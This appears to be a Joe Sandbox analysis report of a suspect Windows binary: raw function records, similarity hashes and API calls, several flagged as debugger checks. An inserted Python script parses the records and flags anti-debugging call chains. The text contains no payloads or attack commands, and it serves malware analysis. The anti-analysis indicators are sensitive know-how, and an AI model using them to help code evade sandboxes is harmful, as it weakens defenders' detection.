• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
• String ID: CMT
• API String ID: 1206968400-2756464174
• Opcode ID: 3c500c223d6952e3428c3389cdfe6460d2c3c4360a748fbcf0a9f44085bb4b4f
• Instruction ID: 47438d2131d41b9a3aa3d4ce782959cb00ae2dcb462f59b241230b9f49c86ce6
• Opcode Fuzzy Hash: 3c500c223d6952e3428c3389cdfe6460d2c3c4360a748fbcf0a9f44085bb4b4f
• Instruction Fuzzy Hash: EB62E1715002448FDB29DF28C885AEA3BA1FF54310F08857EED9ECB28ADB75D945CB61
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0088F844
• IsDebuggerPresent.KERNEL32 ref: 0088F910
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0088F930
• UnhandledExceptionFilter.KERNEL32(?), ref: 0088F93A
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 8ef3e9ca17fb6aae9444784a884bb21ae13f93fdec0354359eac0f008af7d21f
• Instruction ID: fc62e618c3425b53a13a4f377e306ff037087d448235b76f3c9ce2bbdad104ad
• Opcode Fuzzy Hash: 8ef3e9ca17fb6aae9444784a884bb21ae13f93fdec0354359eac0f008af7d21f
• Instruction Fuzzy Hash: 16311875D452199BDB20EFA4D9897CCBBB8FF08304F1040EAE60CAB251EB719B858F45
APIs
• VirtualQuery.KERNEL32(80000000,0088E5E8,0000001C,0088E7DD,00000000,?,?,?,?,?,?,?,0088E5E8,00000004,008D1CEC,0088E86D), ref: 0088E6B4
• GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0088E5E8,00000004,008D1CEC,0088E86D), ref: 0088E6CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: InfoQuerySystemVirtual
• String ID: D
• API String ID: 401686933-2746444292
• Opcode ID: 9f0d4d6b97446874078de8c651e3d70c1682fce61e8edbb9114d53371727b108
• Instruction ID: f09b7c3911505b28b4245574e37d6965ee123a28ece9accef711bade9627639f
• Opcode Fuzzy Hash: 9f0d4d6b97446874078de8c651e3d70c1682fce61e8edbb9114d53371727b108
• Instruction Fuzzy Hash: EE01A7726001096BDB14EE29DC49BDD7BAAFFC5324F0CC124FD59D7154E634D9058790
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00898FB5
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00898FBF
• UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00898FCC
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                    • Opcode ID: 8ea30199e93ffe9c2300d1af4ad0962f8763b7866a37bdd07e74590e708944e1
                                                                                                                                                                                                    • Instruction ID: 9b9c4ae0db53c7cdcbf707c5e024b1d52e585b4262cc0f479e7c40cff81cb687
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ea30199e93ffe9c2300d1af4ad0962f8763b7866a37bdd07e74590e708944e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231D7749012199BCB21EF28D88979CBBB8FF09310F5041EAE51CA7251EB309F818F45
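The function records in this part of the report are raw data; the record above is the one whose API ID is tagged ExceptionFilterUnhandled$DebuggerPresent. As an added example (not Joe Sandbox's code and not part of the original report), the following Python parses records in this layout into structured objects, converts each call-site ref to an RVA using the Offset value (image base) in the Source File line, and flags the SetUnhandledExceptionFilter then UnhandledExceptionFilter sequence that the report associates with debugger detection. The embedded sample text is a constructed, trimmed copy of two of the report's records; the chain label, the record-terminator rule (every record ends with its Instruction Fuzzy Hash line) and the tolerant bullet handling are assumptions made for this example.

```python
"""Parse Joe Sandbox function records and flag API chains of interest (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: two trimmed records in the report's own layout.
SAMPLE_REPORT = """APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00898FBF
• UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00898FCC
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 8ea30199e93ffe9c2300d1af4ad0962f8763b7866a37bdd07e74590e708944e1
• Instruction Fuzzy Hash: 6231D7749012199BCB21EF28D88979CBBB8FF09310F5041EAE51CA7251EB309F818F45
APIs
• GetLastError.KERNEL32(00876DDF,00000000,00000400), ref: 00876C74
• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00876C95
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: fac0bf3a3a7e76f7e9a4211183fe5911a7ec1c7adb41646e4ecaafb505c45682
• Instruction Fuzzy Hash: A8D0C931344700BFFA120B618D06F2B7B99FF86B51F18C404B799E84E0DA78D424B629
"""

# "Name.MODULE(args), ref: ADDR" lines; the leading bullet is optional so pasted text also parses.
_API_CALL = re.compile(
    r"^[•\-*]?\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_KEY_VALUE = re.compile(r"^[•\-*]?\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<value>.*)$")
_OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")

# Ordered API sequences worth a second look. The label is an assumption for this example;
# the pair itself is the one the report tags "ExceptionFilterUnhandled$DebuggerPresent".
CHAINS = {
    "unhandled-exception-filter-debugger-check": ("SetUnhandledExceptionFilter", "UnhandledExceptionFilter"),
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int  # virtual address of the call site as printed in the report


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""
    image_base: Optional[int] = None  # taken from "Offset:" in the Source File line

    def rva(self, call: ApiCall) -> Optional[int]:
        """Call-site address relative to the dumped image, usable in IDA/Ghidra after rebasing."""
        return None if self.image_base is None else call.ref - self.image_base


def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into records; a record is closed by its Instruction Fuzzy Hash line."""
    records: list[FunctionRecord] = []
    current = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _API_CALL.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
            continue
        m = _KEY_VALUE.match(line)
        if not m:
            continue  # bare section headers such as "APIs" or "Similarity"
        key, value = m["key"].strip(), m["value"].strip()
        if key == "Source File":
            off = _OFFSET.search(value)
            if off:
                current.image_base = int(off.group(1), 16)
        elif key == "API ID":
            current.api_id = value
        elif key == "API String ID":
            current.api_string_id = value
        elif key == "Opcode ID":
            current.opcode_id = value
        elif key == "Instruction Fuzzy Hash":
            current.instruction_fuzzy_hash = value
            records.append(current)
            current = FunctionRecord()
    return records


def _is_subsequence(needle: tuple[str, ...], haystack: list[str]) -> bool:
    """True if every name in needle appears in haystack in that order (gaps allowed)."""
    it = iter(haystack)
    return all(any(n == h for h in it) for n in needle)


def find_chains(records: list[FunctionRecord]) -> list[tuple[str, FunctionRecord]]:
    """Return (label, record) pairs for every record whose API sequence contains a known chain."""
    hits = []
    for rec in records:
        names = [c.name for c in rec.apis]
        for label, chain in CHAINS.items():
            if _is_subsequence(chain, names):
                hits.append((label, rec))
    return hits


if __name__ == "__main__":
    for label, rec in find_chains(parse_records(SAMPLE_REPORT)):
        sites = ", ".join(f"{c.name}@RVA 0x{rec.rva(c):X}" for c in rec.apis)
        print(f"{label}: api_id={rec.api_id} fuzzy={rec.instruction_fuzzy_hash[:16]}... [{sites}]")
```

A hit from find_chains is a lead, not a verdict: the same SetUnhandledExceptionFilter then UnhandledExceptionFilter pair also occurs in ordinary compiler runtime fail-fast code, so confirm by looking at the function at the computed RVA and by comparing its Opcode ID or Instruction Fuzzy Hash against other samples before calling it anti-debugging.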

Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
• Instruction ID: 37a296d836f76064bf5bed6053ee979b19119e104b574694502cfa7be3face35
• Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
• Instruction Fuzzy Hash: 52022B71E002199FDF14DFA9C9806ADB7F1FF88314F298269E919E7385D730AA41CB94

APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0088AF35
• GetNumberFormatW.KERNEL32(00000400,00000000,?,008AE72C,?,?), ref: 0088AF84
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
• Opcode ID: 9589ed155844b20a5737e6ca8afb296707a486bd1236a09dfd98165d27b20029
• Instruction ID: abb96be27e20fb23ae2b7998f841b2b4ee0972569b3b9e4950f00a3e59be1b7f
• Opcode Fuzzy Hash: 9589ed155844b20a5737e6ca8afb296707a486bd1236a09dfd98165d27b20029
• Instruction Fuzzy Hash: B5012C7A240319AAE7109FA4EC45F9A77BCFF09710F009422FB05E7191E370AA19CBA5

APIs
• GetLastError.KERNEL32(00876DDF,00000000,00000400), ref: 00876C74
• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00876C95
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: fac0bf3a3a7e76f7e9a4211183fe5911a7ec1c7adb41646e4ecaafb505c45682
• Instruction ID: fbe624652b43b57534a497805f023324f832d92b1c338ab9cdee57a7ba624472
• Opcode Fuzzy Hash: fac0bf3a3a7e76f7e9a4211183fe5911a7ec1c7adb41646e4ecaafb505c45682
• Instruction Fuzzy Hash: A8D0C931344700BFFA120B618D06F2B7B99FF86B51F18C404B799E84E0DA78D424B629

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008A19EF,?,?,00000008,?,?,008A168F,00000000), ref: 008A1C21
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: ff54d963afc5f3b33cf5457db8bca31686f7840fa9826dd86a9cfee807c274d0
• Instruction ID: db2d43cb4a15ee8d680d13afda6650bd7b43e43c5115c37241584009b38f11cf
• Opcode Fuzzy Hash: ff54d963afc5f3b33cf5457db8bca31686f7840fa9826dd86a9cfee807c274d0
• Instruction Fuzzy Hash: 2DB15035610608DFEB15CF28C48AB657BE0FF46364F258658E89ACF6A1C335ED92CB40

APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0088F66A
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 7049d31512ac2240ace38fdd0edae8a265ef334c3999f1107bfe36b8339def01
• Instruction ID: 39c5d42d09dfda52dbc4c68aefc26d052fd5f7a186c41d1dbf22ca0cb2e7aef0
• Opcode Fuzzy Hash: 7049d31512ac2240ace38fdd0edae8a265ef334c3999f1107bfe36b8339def01
• Instruction Fuzzy Hash: 0C5190B19016099FEB24DF98E8957AEBBF5FB48314F24893AD501EB252D374E940CF50

APIs
• GetVersionExW.KERNEL32(?), ref: 0087B16B
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Version
• String ID:
                                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                                    • Opcode ID: d66f255b9a8e8909a8ddcb728b18bb3515c399273894db355a7ae4a0797a41be
                                                                                                                                                                                                    • Instruction ID: c14cb4ce5045f75b6402d11efa0a0f9138e909615288f6fbf83eb56b42ed95fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d66f255b9a8e8909a8ddcb728b18bb3515c399273894db355a7ae4a0797a41be
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9F03AB4E10A088FDB18DB18ECA66D973F2FB99315F604795D619D3390D7B0E9818E60
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID: gj
• API String ID: 0-4203073231
• Opcode ID: fffcb444d9eedc22a78a0af0c1f25a3d90260467368fa856ccf8c223f60819d4
• Instruction ID: 2bb316701494a4c088548af4112817230e72389452fbe3c6149cb5e9715c38ab
• Opcode Fuzzy Hash: fffcb444d9eedc22a78a0af0c1f25a3d90260467368fa856ccf8c223f60819d4
• Instruction Fuzzy Hash: 45C147B2A083418FD354CF29D88065AFBE1BFC9208F19892DE998D7311D734E944DB96
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0088F3A5), ref: 0088F9DA
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 7b1a8f4fac84abe9bf48e37e1bc4b64172175050590d1a5b44b28c1a01af8e7f
• Instruction ID: 281ab486d30aa8518bbb50b083cf2bd7c947db57b6e93318a0f8d58d01e36153
• Opcode Fuzzy Hash: 7b1a8f4fac84abe9bf48e37e1bc4b64172175050590d1a5b44b28c1a01af8e7f
• Instruction Fuzzy Hash:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 5aac3293f61b99b4809a0b1a068836080ad6d4abf333f95b239ed7aa3865c450
• Instruction ID: 5c7848f27151bffe2353cfcdaea72e1e50ff1d18dc47bf789b9663286c100f2e
• Opcode Fuzzy Hash: 5aac3293f61b99b4809a0b1a068836080ad6d4abf333f95b239ed7aa3865c450
• Instruction Fuzzy Hash: AAA001706026019BAB448F35AE496493BA9FA66691709816AB509C5560EA2485A0AB01
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
• Instruction ID: cee78443973bdc98138b0bf2df53db0c8925356691d653f7d2b9d0a59ebf0f5d
• Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
• Instruction Fuzzy Hash: 0F62C1716047898FCB25DF28C8906A9BBE1FF95304F08896DD8AACB346E734E955CB11
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
• Instruction ID: cbfb027fc935f0d048b2ab37bb05d054f2e6c3c1b6fb52e491b9e2379aa52d0d
• Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
• Instruction Fuzzy Hash: CD62C5716083498FCB19DF28C8809A9BBF1FF95304F18896DE99ACB346D730E945CB15
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
• Instruction ID: e43a11e1493dbf65976b5c4919c2abdda4861909cf1ed084fa3456d3bdefc35b
• Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
• Instruction Fuzzy Hash: FE524972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 26df1b3144b81dd329e072f6770dff52904025d434637cfca8b5ec040aa9bbac
                                                                                                                                                                                                    • Instruction ID: 9bb2a6bd25eac8e7798150ffeeed1c64d2ecb79442c43d08275208b8fbf81557
